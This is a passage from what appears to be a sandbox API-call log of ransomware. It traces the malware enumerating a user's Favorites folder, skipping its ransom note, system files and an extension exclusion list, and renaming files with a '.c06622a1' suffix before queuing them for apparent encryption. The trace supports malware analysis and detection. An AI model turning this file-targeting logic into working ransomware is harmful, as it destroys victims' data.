_Str2="url") returned -2 [0150.164] wcslen (_String="sqlite") returned 0x6 [0150.165] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0150.165] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.165] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0150.165] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0150.165] wcscpy (in: _Dest=0x4500102, _Source="MSN Autos.url" | out: _Dest="MSN Autos.url") returned="MSN Autos.url" [0150.165] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x80) returned 1 [0150.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0150.165] SetFilePointerEx (in: hFile=0x648, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.165] CloseHandle (hObject=0x648) returned 1 [0150.165] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.165] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" [0150.165] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 0x46 [0150.165] wcscpy (in: _Dest=0x4510124, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.165] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.c06622a1"), dwFlags=0x8) returned 1 [0150.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x648 [0150.167] CreateIoCompletionPort (FileHandle=0x648, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.167] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0150.173] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6538a058 [0150.173] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x45d48b2 [0150.173] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x221e9bf5 [0150.173] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1bdb75b9 [0150.173] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14f9f91b [0150.173] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x212fa66 [0150.173] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x31bc7e13 [0150.173] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d0fb5ad [0150.176] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0xf2def9d1 [0150.176] RtlComputeCrc32 (PartialCrc=0xf9d1, Buffer=0x4790094, Length=0x80) returned 0xbff12f08 [0150.176] RtlComputeCrc32 (PartialCrc=0x2f08, Buffer=0x4790094, Length=0x80) returned 0x8455262a [0150.176] RtlComputeCrc32 (PartialCrc=0x262a, Buffer=0x4790094, Length=0x80) returned 0x70cc8ee8 [0150.176] RtlComputeCrc32 (PartialCrc=0x8ee8, Buffer=0x4790094, Length=0x80) returned 0xaee31331 [0150.176] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0150.176] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.176] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.176] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0150.176] _wcsicmp (_Str1="MSN Entertainment.url", _Str2="README.c06622a1.TXT") returned -5 [0150.176] wcsstr (_Str="MSN Entertainment.url", _SubStr="README") returned 0x0 [0150.176] _wcsicmp (_Str1="autorun.inf", _Str2="MSN Entertainment.url") returned -12 [0150.176] wcslen (_String="autorun.inf") returned 0xb [0150.176] _wcsicmp (_Str1="boot.ini", _Str2="MSN Entertainment.url") returned -11 [0150.176] wcslen (_String="boot.ini") returned 0x8 [0150.176] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN Entertainment.url") returned -11 [0150.176] wcslen (_String="bootfont.bin") returned 0xc [0150.176] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN Entertainment.url") returned -11 [0150.176] wcslen (_String="bootsect.bak") returned 0xc [0150.176] _wcsicmp (_Str1="desktop.ini", _Str2="MSN Entertainment.url") returned -9 [0150.176] wcslen (_String="desktop.ini") returned 0xb [0150.176] _wcsicmp (_Str1="iconcache.db", _Str2="MSN Entertainment.url") returned -4 [0150.176] wcslen (_String="iconcache.db") returned 0xc [0150.176] _wcsicmp (_Str1="ntldr", _Str2="MSN Entertainment.url") returned 1 [0150.177] wcslen (_String="ntldr") returned 0x5 [0150.177] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN Entertainment.url") returned 1 [0150.177] wcslen (_String="ntuser.dat") returned 0xa [0150.177] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN Entertainment.url") returned 1 [0150.177] wcslen (_String="ntuser.dat.log") returned 0xe [0150.177] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN Entertainment.url") returned 1 [0150.177] wcslen (_String="ntuser.ini") returned 0xa [0150.177] _wcsicmp (_Str1="thumbs.db", _Str2="MSN Entertainment.url") returned 7 [0150.177] wcslen (_String="thumbs.db") returned 0x9 [0150.177] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.177] wcslen (_String="386") returned 0x3 [0150.177] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.177] wcslen (_String="adv") returned 0x3 [0150.177] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.177] wcslen (_String="ani") returned 0x3 [0150.177] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.177] wcslen (_String="bat") returned 0x3 [0150.177] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.177] wcslen (_String="bin") returned 0x3 [0150.177] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.177] wcslen (_String="cab") returned 0x3 [0150.177] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.177] wcslen (_String="cmd") returned 0x3 [0150.177] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.177] wcslen (_String="com") returned 0x3 [0150.177] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.177] wcslen (_String="cpl") returned 0x3 [0150.177] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.177] wcslen (_String="cur") returned 0x3 [0150.177] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.177] wcslen (_String="deskthemepack") returned 0xd [0150.177] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.177] wcslen (_String="diagcab") returned 0x7 [0150.177] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.177] wcslen (_String="diagcfg") returned 0x7 [0150.177] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.177] wcslen (_String="diagpkg") returned 0x7 [0150.178] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.178] wcslen (_String="dll") returned 0x3 [0150.178] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.178] wcslen (_String="drv") returned 0x3 [0150.178] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.178] wcslen (_String="exe") returned 0x3 [0150.178] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.178] wcslen (_String="hlp") returned 0x3 [0150.178] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.178] wcslen (_String="icl") returned 0x3 [0150.178] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.178] wcslen (_String="icns") returned 0x4 [0150.178] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.178] wcslen (_String="ico") returned 0x3 [0150.178] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.178] wcslen (_String="ics") returned 0x3 [0150.178] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.178] wcslen (_String="idx") returned 0x3 [0150.178] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.178] wcslen (_String="ldf") returned 0x3 [0150.178] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.178] wcslen (_String="lnk") returned 0x3 [0150.178] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.178] wcslen (_String="mod") returned 0x3 [0150.178] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.178] wcslen (_String="mpa") returned 0x3 [0150.178] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.178] wcslen (_String="msc") returned 0x3 [0150.178] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.178] wcslen (_String="msp") returned 0x3 [0150.178] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.178] wcslen (_String="msstyles") returned 0x8 [0150.178] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.178] wcslen (_String="msu") returned 0x3 [0150.178] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.178] wcslen (_String="nls") returned 0x3 [0150.178] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.179] wcslen (_String="nomedia") returned 0x7 [0150.179] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.179] wcslen (_String="ocx") returned 0x3 [0150.179] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.179] wcslen (_String="prf") returned 0x3 [0150.179] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.179] wcslen (_String="ps1") returned 0x3 [0150.179] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.179] wcslen (_String="rom") returned 0x3 [0150.179] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.179] wcslen (_String="rtp") returned 0x3 [0150.179] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.179] wcslen (_String="scr") returned 0x3 [0150.179] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.179] wcslen (_String="shs") returned 0x3 [0150.179] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.179] wcslen (_String="spl") returned 0x3 [0150.179] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.179] wcslen (_String="sys") returned 0x3 [0150.179] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.179] wcslen (_String="theme") returned 0x5 [0150.179] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.179] wcslen (_String="themepack") returned 0x9 [0150.179] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.179] wcslen (_String="wpx") returned 0x3 [0150.179] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.179] wcslen (_String="lock") returned 0x4 [0150.179] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.179] wcslen (_String="key") returned 0x3 [0150.179] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.179] wcslen (_String="hta") returned 0x3 [0150.179] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.179] wcslen (_String="msi") returned 0x3 [0150.179] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.179] wcslen (_String="pdb") returned 0x3 [0150.179] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.179] wcslen (_String="sql") returned 0x3 [0150.180] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.180] wcslen (_String="sqlite") returned 0x6 [0150.180] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0150.180] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.180] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0150.180] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0150.180] wcscpy (in: _Dest=0x4500102, _Source="MSN Entertainment.url" | out: _Dest="MSN Entertainment.url") returned="MSN Entertainment.url" [0150.180] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url", dwFileAttributes=0x80) returned 1 [0150.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0 [0150.181] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.181] CloseHandle (hObject=0x2e0) returned 1 [0150.181] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.181] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" [0150.181] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 0x4e [0150.181] wcscpy (in: _Dest=0x4510134, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.181] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.c06622a1"), dwFlags=0x8) returned 1 [0150.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x2e0 [0150.183] CreateIoCompletionPort (FileHandle=0x2e0, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.183] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4820020 [0150.191] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2004ed19 [0150.191] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x402827b9 [0150.191] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x22afd526 [0150.191] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6306c73f [0150.191] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7a4dee78 [0150.191] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2759542e [0150.191] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x57184564 [0150.191] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c1c86bf [0150.194] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4820094, Length=0x80) returned 0x82789afc [0150.194] RtlComputeCrc32 (PartialCrc=0x9afc, Buffer=0x4820094, Length=0x80) returned 0xcdb9015a [0150.194] RtlComputeCrc32 (PartialCrc=0x15a, Buffer=0x4820094, Length=0x80) returned 0x4c45925c [0150.194] RtlComputeCrc32 (PartialCrc=0x925c, Buffer=0x4820094, Length=0x80) returned 0xda1c7584 [0150.194] RtlComputeCrc32 (PartialCrc=0x7584, Buffer=0x4820094, Length=0x80) returned 0xa3575ad2 [0150.194] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0150.195] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.195] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.195] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0150.195] _wcsicmp (_Str1="MSN Money.url", _Str2="README.c06622a1.TXT") returned -5 [0150.195] wcsstr (_Str="MSN Money.url", _SubStr="README") returned 0x0 [0150.195] _wcsicmp (_Str1="autorun.inf", _Str2="MSN Money.url") returned -12 [0150.195] wcslen (_String="autorun.inf") returned 0xb [0150.195] _wcsicmp (_Str1="boot.ini", _Str2="MSN Money.url") returned -11 [0150.195] wcslen (_String="boot.ini") returned 0x8 [0150.195] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN Money.url") returned -11 [0150.195] wcslen (_String="bootfont.bin") returned 0xc [0150.195] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN Money.url") returned -11 [0150.195] wcslen (_String="bootsect.bak") returned 0xc [0150.195] _wcsicmp (_Str1="desktop.ini", _Str2="MSN Money.url") returned -9 [0150.195] wcslen (_String="desktop.ini") returned 0xb [0150.195] _wcsicmp (_Str1="iconcache.db", _Str2="MSN Money.url") returned -4 [0150.195] wcslen (_String="iconcache.db") returned 0xc [0150.195] _wcsicmp (_Str1="ntldr", _Str2="MSN Money.url") returned 1 [0150.195] wcslen (_String="ntldr") returned 0x5 [0150.195] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN Money.url") returned 1 [0150.195] wcslen (_String="ntuser.dat") returned 0xa [0150.195] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN Money.url") returned 1 [0150.195] wcslen (_String="ntuser.dat.log") returned 0xe [0150.195] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN Money.url") returned 1 [0150.195] wcslen (_String="ntuser.ini") returned 0xa [0150.195] _wcsicmp (_Str1="thumbs.db", _Str2="MSN Money.url") returned 7 [0150.195] wcslen (_String="thumbs.db") returned 0x9 [0150.195] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.195] wcslen (_String="386") returned 0x3 [0150.195] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.195] wcslen (_String="adv") returned 0x3 [0150.195] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.195] wcslen (_String="ani") returned 0x3 [0150.195] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.195] wcslen (_String="bat") returned 0x3 [0150.196] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.196] wcslen (_String="bin") returned 0x3 [0150.196] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.196] wcslen (_String="cab") returned 0x3 [0150.196] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.196] wcslen (_String="cmd") returned 0x3 [0150.196] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.196] wcslen (_String="com") returned 0x3 [0150.196] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.196] wcslen (_String="cpl") returned 0x3 [0150.196] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.196] wcslen (_String="cur") returned 0x3 [0150.196] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.196] wcslen (_String="deskthemepack") returned 0xd [0150.196] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.196] wcslen (_String="diagcab") returned 0x7 [0150.196] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.196] wcslen (_String="diagcfg") returned 0x7 [0150.196] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.196] wcslen (_String="diagpkg") returned 0x7 [0150.196] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.196] wcslen (_String="dll") returned 0x3 [0150.196] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.196] wcslen (_String="drv") returned 0x3 [0150.196] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.196] wcslen (_String="exe") returned 0x3 [0150.196] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.196] wcslen (_String="hlp") returned 0x3 [0150.196] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.196] wcslen (_String="icl") returned 0x3 [0150.196] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.196] wcslen (_String="icns") returned 0x4 [0150.196] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.196] wcslen (_String="ico") returned 0x3 [0150.196] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.196] wcslen (_String="ics") returned 0x3 [0150.196] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.196] wcslen (_String="idx") returned 0x3 [0150.197] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.197] wcslen (_String="ldf") returned 0x3 [0150.197] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.197] wcslen (_String="lnk") returned 0x3 [0150.197] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.197] wcslen (_String="mod") returned 0x3 [0150.197] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.197] wcslen (_String="mpa") returned 0x3 [0150.197] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.197] wcslen (_String="msc") returned 0x3 [0150.197] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.197] wcslen (_String="msp") returned 0x3 [0150.197] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.197] wcslen (_String="msstyles") returned 0x8 [0150.197] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.197] wcslen (_String="msu") returned 0x3 [0150.197] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.197] wcslen (_String="nls") returned 0x3 [0150.197] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.197] wcslen (_String="nomedia") returned 0x7 [0150.197] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.197] wcslen (_String="ocx") returned 0x3 [0150.197] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.197] wcslen (_String="prf") returned 0x3 [0150.197] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.197] wcslen (_String="ps1") returned 0x3 [0150.197] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.197] wcslen (_String="rom") returned 0x3 [0150.197] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.197] wcslen (_String="rtp") returned 0x3 [0150.197] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.197] wcslen (_String="scr") returned 0x3 [0150.197] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.197] wcslen (_String="shs") returned 0x3 [0150.197] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.197] wcslen (_String="spl") returned 0x3 [0150.197] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.197] wcslen (_String="sys") returned 0x3 [0150.198] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.198] wcslen (_String="theme") returned 0x5 [0150.198] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.198] wcslen (_String="themepack") returned 0x9 [0150.198] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.198] wcslen (_String="wpx") returned 0x3 [0150.198] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.198] wcslen (_String="lock") returned 0x4 [0150.198] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.198] wcslen (_String="key") returned 0x3 [0150.198] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.198] wcslen (_String="hta") returned 0x3 [0150.198] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.198] wcslen (_String="msi") returned 0x3 [0150.198] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.198] wcslen (_String="pdb") returned 0x3 [0150.198] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.198] wcslen (_String="sql") returned 0x3 [0150.198] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.198] wcslen (_String="sqlite") returned 0x6 [0150.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0150.198] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.198] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0150.198] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0150.198] wcscpy (in: _Dest=0x4500102, _Source="MSN Money.url" | out: _Dest="MSN Money.url") returned="MSN Money.url" [0150.198] SetFileAttributesW 